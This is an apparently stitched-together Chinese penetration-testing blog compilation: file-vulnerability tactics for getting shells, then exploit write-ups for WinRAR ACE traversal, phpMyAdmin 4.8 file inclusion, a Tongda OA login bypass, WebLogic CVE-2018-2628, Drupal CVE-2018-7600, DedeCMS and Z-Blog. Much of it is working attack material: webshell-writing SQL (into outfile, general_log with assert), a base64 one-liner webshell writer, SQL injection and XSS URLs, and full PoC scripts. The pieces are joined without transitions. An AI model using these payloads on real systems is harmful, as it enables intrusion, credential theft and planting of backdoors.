文件操作漏洞

1. 文件上传
2. 文件读取
3. 文件写入
4. 文件删除
5. 文件包含

一般java的站点存在文件系列的洞比较多(除了文件包含)。

文件上传

在哪最容易发现上传点？注册登陆用户头像、发布文章发布产品、js中的文件上传接口、一些编辑器，甚至还有扫目录扫出来的/uploader路径，访问出现这种405的uploader一般就是上传。比如：

这个时候本地构造POST表单就行了，file参数靠猜，有的时候任意参数就行，有的时候post提交过去会报错缺失什么参数，随机应变。

一般上java的站点扫出来这种uploader比较多，都是上传写的servlet接口。

上传其实upload-labs里的绕过姿势已经非常全面了。拿到一个上传点，首先应该判断能不能正常上传、白名单还是黑名单、怎么校验的在哪校验的，这些没什么好讲的。聊一些比较恶心的文件上传。

1. 上传不返回路径
2. 上传不在web目录

上传不返回路径多出现在市长邮箱、投诉举报这类功能中，其实这种功能本来就没打算给你返回路径。我的思路一般是找注入点，只要没返回路径的文件上传并且返回给你一个ID给你当作凭据的(此处只是举例，类推)，肯定保存路径在数据库中。找到注入就等于找到了文件路径。

如果没有注入呢？找找日志。比如tp的日志是有规律的，你可以传一个非法文件名1.;，在tp的日志中报错，说不定就有路径。这个我自己是真实碰到的，一个laravel的框架，在laravel.log中报错返回了错误文件名的文件路径，猜出来了shell的路径。

如果没有日志呢？猜。形如/Files/、/uploads/目录，猜要有根据的猜，观察网站的图片和文件地址，以此拼接你的shell文件名，多数以时间戳命名，bp爆破下就行了。

再来说不在web目录的，上传的时候关注下请求包的几个参数，有没有path、filepath、filename、file_prefix，甚至测一下../../1.jpg文件名。如果上传不能跨目录其实你就应该转移关注点了。找文件包含、文件读取。

上传不在web目录的站，有这种功能的很多都有文件读取的洞，因为传上去的文件总归是要下回来的，找找形如download?path=1.jpg这种。拓展思路，举一反三。

另外就是文件包含了，没啥可说的。

文件读取

限制条件有两个

1. 限制前缀
2. 限制后缀

不限制前缀的时候可以通过file协议读文件，php可以通过伪协议读文件，当限制前缀的时候Linux其实还好，可以通过../跳目录，但是windows没办法通过../跳盘符。

限制后缀就比较恶心了，php好像可以用#、?符号去绕过。具体看 chybeta师傅的文章 吧。

确定是文件读取之后，如何进一步拿权限？个人习惯先读/etc/passwd，权限够大直接读/etc/shadow，然后根据/etc/passwd读每个用户的.bash_history，读中间件的配置文件，以此判断web的绝对路径。然后逐个读源码，java的话可以读一下war包，搞到代码之后就变得so easy了。

举个例子：文件读取读到了旁站的war包，旁站是一个监控，就一个登陆框，而war包中配置文件里写死了密码，刚好登陆进去直接可以执行命令rce。

weblogic的话可以直接读console账号密码，登陆console部署war包getshell。

反正就是文件读取=60%中间件特性+10%猜+30%运气。

文件写入

文件写入拿shell很简单，直接指定web目录和内容就行了。但是这个一般上会有限制，比如内容检测(不能写php标签之类)，文件名检测(不能写.php)。

1. 写计划任务或许为一个好的选择
2. 覆盖原有配置文件(比如覆盖安装锁)
3. 写ssh

文件写入好像没什么好说的，先就这样，想到什么补充什么。

文件删除

实战没怎么遇到过这个洞

1. 删除配置文件
2. 删除安装锁(造成重装)
3. 删除waf文件include waf.php

文件包含

文件包含多为php站点，所以伪协议读文件这些都是基本操作。不过有一说一，除了ctf中碰到过文件包含，实战中没遇到过。

具体看 chybeta师傅的文章-php文件包含漏洞

需要提一嘴的是phar可以伪装为图片，你可以传一个1.jpg，绕过内容检测，然后用phar://协议包含。还有就是smb包含，php缓存文件包含。

或许渗透变化万千的思路才是我真正喜欢他的原因。

近日Check Point团队爆出了一个关于WinRAR存在19年的漏洞，用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件，当受害者使用WinRAR解压该恶意文件时便会触发漏洞。

该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的，该动态链接库在 2006 年被编译，没有任何的基础保护机制(ASLR, DEP 等)。动态链接库的作用是处理 ACE 格式文件。而WinRAR解压ACE文件时，由于没有对文件名进行充分过滤，导致其可实现目录穿越，将恶意文件写入任意目录,甚至可以写入文件至开机启动项，导致代码执行

漏洞影响:

影响软件：

WinRAR < 5.70 Beta 1

Bandizip < = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩 < = 4.0.0.1170

等等…

漏洞复现:

该漏洞的实现过程：首先新建一个任意文件，然后利用WinACE进行压缩，修改filename来实现目录穿越漏洞，可以将文件解压到任意目录中。

主要所需工具WinACE、010Editor。

下载WinACE并安装，安装完成后新建一个文本文件，名字任意。

然后利用WinACE进行压缩。

设置为store full path

3通过脚本检查rar的header信息，其脚本下载地址为：

https://raw.githubusercontent.com/backlion/acefile/master/acefile.py

使用命令python acefile.py --headers test.ace来读取该文件头信息

要注意这三块

hdr_crc

hdr_size

filename的长度

filename

使用010 Editor打开ace文件进行修改(这里要注意修改顺序是从后往前的)

如果要修改filename，则需要修改上面标注这几处。第一处为0xd9e2(hdr_crc),第二处为0x0027(hdr_size)，第三处为0x0008(filename的长度），以及最后一处为filename

这里修改filename为d:\d:\test.txt

长度为14，对应的hex为0x000e

然后修改hdr_size，长度为45，对应的hex为0x002d

接下来就是修改hdr_crc了，这里有一个取巧的方法。

我们再次运行命令python acefile.py --headers test.ace

程序中断并提示CorruptedArchiveError: header CRC failed

定位到错误的位置

然后去修改hdr_crc 为0xb2f3

再次查看，可以正常解析，并看到filename已经修改成功

右键解压该文件，则会在D盘生成一个test.txt文件。

解压后会在D盘生成一个test.txt文件

修复建议

1. 升级到最新版本，WinRAR 目前版本是 5.70 Beta 1

2. 删除UNACEV2.dll文件，解压则会报错

参考:https://fuping.site/2019/02/21/WinRAR-Extracting-Code-Execution-Validate/

2018年12月7日，phpmyadmin官方发布公告修复了一个由Transformation特性引起的任意文件包含漏洞。

漏洞分析

Transformation是phpMyAdmin中的一个高级功能，通过Transformation可以对每个字段的内容使用不同的转换，每个字段中的内容将被预定义的规则所转换。比如我们有一个存有文件名的字段Filename，正常情况下 phpMyAdmin 只会将路径显示出来。但是通过Transformation我们可以将该字段转换成超链接，我们就能直接在 phpMyAdmin 中点击并在浏览器的新窗口中看到这个文件。

通常情况下Transformation的规则存储在每个数据库的pma__column_info表中，而在phpMyAdmin 4.8.0~4.8.3版本中，由于对转换参数处理不当，导致了任意文件包含漏洞的出现。

这些转换在phpMyAdmin的column_info表中定义，他通常已经存在于phpMyAdmin的系统表中。但是每个数据库都可以生成自己的版本。要为特定数据库生成phpmyadmin系统表，可以这样生成

http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*

它将会创建一个pma__*表的集合到你数据库中。

说了这么多，我们来看下具体产生漏洞的代码tbl_replace.php

<?php

$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[省略]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
&& !empty($mime_map[$column_name]['input_transformation'])
) {
   $filename = 'libraries/classes/Plugins/Transformations/'
. $mime_map[$column_name]['input_transformation'];
   if (is_file($filename)) {
      include_once $filename;
      $classname = Transformations::getClassName($filename);
      /** @var IOTransformationsPlugin $transformation_plugin */
      $transformation_plugin = new $classname();
      $transformation_options = Transformations::getOptions(
         $mime_map[$column_name]['input_transformation_options']
      );
      $current_value = $transformation_plugin->applyTransformation(
         $current_value, $transformation_options
      );
      // check if transformation was successful or not
      // and accordingly set error messages & insert_fail
      if (method_exists($transformation_plugin, 'isSuccess')
&& !$transformation_plugin->isSuccess()
) {
         $insert_fail = true;
         $row_skipped = true;
         $insert_errors[] = sprintf(
            __('Row: %1$s, Column: %2$s, Error: %3$s'),
            $rownumber, $column_name,
            $transformation_plugin->getError()
         );
      }
   }
}

拼接到$filename的变量$mime_map[$column_name]['input_transformation']来自于数据表pma__column_info中的input_transformation字段，因为数据库中的内容用户可控，从而产生了任意文件包含漏洞。

漏洞利用

1. 创建一个新的数据库foo和一个随机的bar表，在表中创建一个baz字段，然后把我们的php代码写入session

   CREATE DATABASE foo;
   CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
   INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';

2. 创建phpmyadmin系统表在你的foo数据库中

   http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo

3. 将篡改后的Transformation数据插入表pma__columninfo中：将yourSessionId替换成你的会话ID，即COOKIE中phpMyAdmin的值

   INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
   'plop', 'plop', 'plop',
   '../../tmp/sess_{yourSessionId}','plop';

4. 然后访问

   http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

   如果利用成功，则会返回phpinfo();

团队一起日站的时候发现了一个oa，然后就一顿乌云找到了这个，成功getshell。

变量覆盖

登录构造请求数据包

POST /logincheck.php HTTP/1.1
Host: xx.xx.com
Content-Length: 182
Cache-Control: max-age=0
Origin: http://xx.xx.com/
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xx.xx.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SID_1=8b3cb1d3; PHPSESSID=he68espbvu9oq0rgamruvhs114
Connection: close

USERNAME=admin&PASSWORD=&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=123.123.123.123&MYOA_MASTER_DB[user]=root&MYOA_MASTER_DB[pwd]=rootpassword&MYOA_MASTER_DB[db]=oa&encode_type=1&button=

其中的MySQL数据库链接配置需要自己搭建外网MySQL，并且开通root外链。

TD_OA.sql 下载导入

getshell

后台有 sql 导入功能, 有两种方法, 使用 into outfile 或者用 general_log

update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;

set global general_log = on;
set global general_log_file = '../webroot/test.php';
select '<?php assert($_POST[a]) ?>';
set global general_log = off;

2.复现过程
目标环境：虚拟机windows 8
IP: 192.168.192.141

受影响版本为Windows 8.1和Windows server 2012 R2，这里选取了Windows8.1。

攻击端环境：Kali Linux
IP：192.168.192.139

运行PoC脚本等待靶机访问。

靶机中输入Kali Linux的IP访问。

触发BSoD。

3.参考链接
https://krbtgt.pw/smbv3-null-pointer-dereference-vulnerability/
https://www.exploit-db.com/exploits/44189/

http://www.lengbaikai.net/?p=250

今早，朋友圈就刷爆了这个漏洞，但是目前只有POC验证脚本放出，后续有exp放出时，我会继续更新这篇博文。

0x01 综述

当地时间4月17日，北京时间4月18日凌晨，Oracle官方发布了4月份的关键补丁更新CPU（Critical Patch Update）,其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628)，这个漏洞是我在去年11月份报给Oracle的，通过该漏洞，攻击者可以在未授权的情况下远程执行任意代码。

参考链接：

http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

漏洞影响范围

Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3

0x02 复现

目前流传比较广的是weblogic_poc.client1.for.scan-cve-2018-2628.py这个验证脚本，我们来开一个weblogic玩玩~

OK打开正常，这里的版本是12c

#!env python
#coding=utf-8
#
# Author:       liaoxinxi@nsfocus.com
#
# Created Time: Wed 19 Jul 2017 01:47:53 AM CST
#
# FileName:     weblogic_poc.py
#
# Description:
#
# ChangeLog:
# -*- coding: utf-8 -*-
import socket
import time
import re
VUL=['CVE-2018-2628']
PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
VER_SIG=['\\$Proxy[0-9]+']
def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print 'handshake successful'
def buildT3RequestObject(sock,port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
def sendEvilObjData(sock,data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception as e:
        pass
    return res
def checkVul(res,server_addr,index):
    p=re.findall(VER_SIG[index], res, re.S)
    if len(p)>0:
        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])
    else:
        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
def run(dip,dport,index):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3handshake(sock,server_addr)
    buildT3RequestObject(sock,dport)
    rs=sendEvilObjData(sock,PAYLOAD[index])
    print 'rs',rs
    checkVul(rs,server_addr,index)
if __name__=="__main__":
    dip = '218.1.102.99'
    dip = '10.65.46.125'
    dip = '192.168.3.216'
    dport = 7001
    run(dip,dport,0)
#    for i in range(0,len(VUL)):
#        run(dip,dport,i)

这里只是验证存在漏洞，我会持续关注，待能执行命令的exp放出来之后我会接着更新。

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .

影响版本

1. Drupal 6
2. Drupal 7
3. Drupal 8

修复建议

Drupal 6.x的修复参考以下网站：

https://www.drupal.org/project/d6lts

Drupal 7.x请升级到Drupal 7.5.8版本，

同时官方给出7.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5

Drupal 8.5.x请升级到Drupal 8.5.1版本

同时官方给出8.5.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

Drupal 8.3.x和8.4.x版本官方已不进行维护，但此漏洞非常严重，官方此次也给出了对应补丁，补丁同8.5.x版本：补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

由于Drupal 8.3.x和8.4.x版本官方已不进行维护，建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本

友情提示

Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护，请各位用户升级到官方维护的版本

EXP

#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

@泡泡龙等了很久的文章了，如果本文有错欢迎评论指点，欢迎补充。

Dedecms V5.7 后台文件重命名

/web/81/

Dedecms V5.7 后台任意代码执行

/web/79/

解决历史难题 – DEDECMS 织梦找后台目录

/web/51/

dedecms爆绝对路径

/member/templets/menulit.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php

以下漏洞来自互联网收集

DedeCMS全版本通杀SQL注入漏洞利用

2016年7月11日
http://www.weixianmanbu.com/article/157.html

Dedecms 5.6 rss注入漏洞

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1  

DedeCms v5.6 嵌入恶意代码执行漏洞

注册会员，上传软件：本地地址中填入

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}  

发表后查看或修改即可执行

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}   

生成x.php 密码xiao，直接生成一句话。

Dede 5.6 GBK SQL注入漏洞

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/>
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''">  

可看见错误信息

1. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。

int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?> 

1. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是

按确定后的看到第2步骤的信息表示文件木马上传成功.

织梦(DedeCms)plus/infosearch.php 文件注入漏洞

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*  

DEDECMS跨站及爆绝对路径漏洞
提交：

http://127.0.0.1/dc/include/jump.php?gurl= 会跳转到/

新手朋友会认为这就是这个跨站的利用了，其实不然，我们可以尝试去闭合他！但PHP有gpc限制，我们该怎么绕？
提交：

http://127.0.0.1/dc/include/jump.php?gurl=%23"alert(/00day.cn/)/*  

Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x

# .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A Public release vulnz: {26-08-2008 Sun}
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&y=53
- XSS -
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]  

Php Path Discusion

[DedeCms WebSite]/include/dialog/  

XSRF

[DedeCms WebSite]/dede/sys_info.php? have XSRF
edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code
if attacker wright a "end of textarea"  tag thats give XSS alert :)
[XSS Code] :'">alert(document.cookie)  

织梦(dedecms)2007 group/search.php注入漏洞

http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'  

poc:

ZC_BLOG_SUBNAME参数的POC:

http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f

post_data:

ZC_BLOG_HOST=http%3A%2F%2Flocalhost%2Fz-blog%2F&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good%20Luck%20To%20You!tluf3%22%3e%3cscript%3ealert(1)%3c%2fscript%3euk095&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia%2FShanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg%7Cgif%7Cpng%7Cjpeg%7Cbmp%7Cpsd%7Cwmf%7Cico%7Crpm%7Cdeb%7Ctar%7Cgz%7Csit%7C7z%7Cbz2%7Czip%7Crar%7Cxml%7Cxsl%7Csvg%7Csvgz%7Crtf%7Cdoc%7Cdocx%7Cppt%7Cpptx%7Cxls%7Cxlsx%7Cwps%7Cchm%7Ctxt%7Cpdf%7Cmp3%7Cmp4%7Cavi%7Cmpg%7Crm%7Cra%7Crmvb%7Cmov%7Cwmv%7Cwma%7Cswf%7Cfla%7Ctorrent%7Capk%7Czba%7Cgzba&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

ZC_UPLOAD_FILETYPE 参数的POC:

post_data:

ZC_BLOG_HOST=http://localhost/z-blog/&ZC_PERMANENT_DOMAIN_ENABLE=&ZC_PERMANENT_DOMAIN_WITH_ADMIN=&ZC_BLOG_NAME=admin&ZC_BLOG_SUBNAME=Good+Luck+To+You!&ZC_BLOG_COPYRIGHT=Copyright+Your+WebSite.Some+Rights+Reserved.&ZC_TIME_ZONE_NAME=Asia/Shanghai&ZC_BLOG_LANGUAGEPACK=zh-cn&ZC_UPLOAD_FILETYPE=jpg|gif|png|jpeg|bmp|psd|wmf|ico|rpm|deb|tar|gz|sit|7z|bz2|zip|rar|xml|xsl|svg|svgz|rtf|doc|docx|ppt|pptx|xls|xlsx|wps|chm|txt|pdf|mp3|mp4|avi|mpg|rm|ra|rmvb|mov|wmv|wma|swf|fla|torrent|apk|zba|gzbauckek">alert(1)ekkgh&ZC_UPLOAD_FILESIZE=2&ZC_DEBUG_MODE=&ZC_GZIP_ENABLE=&ZC_SYNTAXHIGHLIGHTER_ENABLE=1&ZC_CLOSE_SITE=&ZC_DISPLAY_COUNT=10&ZC_DISPLAY_SUBCATEGORYS=1&ZC_PAGEBAR_COUNT=10&ZC_SEARCH_COUNT=20&ZC_MANAGE_COUNT=50&ZC_COMMENT_TURNOFF=&ZC_COMMENT_AUDIT=&ZC_COMMENT_REVERSE_ORDER=&ZC_COMMENTS_DISPLAY_COUNT=100&ZC_COMMENT_VERIFY_ENABLE=

链接: https://pan.baidu.com/s/1EseuV0RRtS7MYIDK03uhYw 密码: hfxv